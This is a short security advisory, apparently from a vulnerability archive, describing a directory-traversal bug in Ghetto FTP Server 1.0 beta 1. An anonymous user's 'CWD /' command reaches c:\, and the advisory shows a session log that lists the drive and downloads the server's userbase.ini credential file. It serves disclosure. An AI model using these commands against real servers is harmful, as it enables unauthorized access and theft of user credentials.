COMMAND

    Ghetto FTP Server

SYSTEMS AFFECTED

    Ghetto FTP Server version 1.0 beta 1

PROBLEM

    Following is based on a Hexyn/Securax Advisory #16.  G6 FTP Server
    is an  FTP server  for Windows  9x/NT. A  bug allows  any user  to
    change to c:\ and sub directories.

    When sending the command  "CWD /" (or "cd  /" in the default  UNIX
    FTP client), Ghetto FTP will change to c:\.

        <snip>
        230 User anonymous logged in.
        Remote system type is UNIX.
        Using binary mode to transfer files.
        ftp> cd /
        250 CWD command successful.
        ftp> ls
        200 PORT command successful.
        150 Opening ASCII mode data connection for /.
        <directory listing of c:\>
        ftp> GET /Program Files/CorbaSoft/GFTPS/userbase.ini
        local: userbase.ini remote: userbase.ini
        200 PORT command successful.
        150 Opening BINARY mode data connection.
        226 Transfer complete.
        3048 bytes received in 0.214 secs (14 Kbytes/sec)
        ftp> quit
        221 Bye.

SOLUTION

    At this time, no patch is available yet.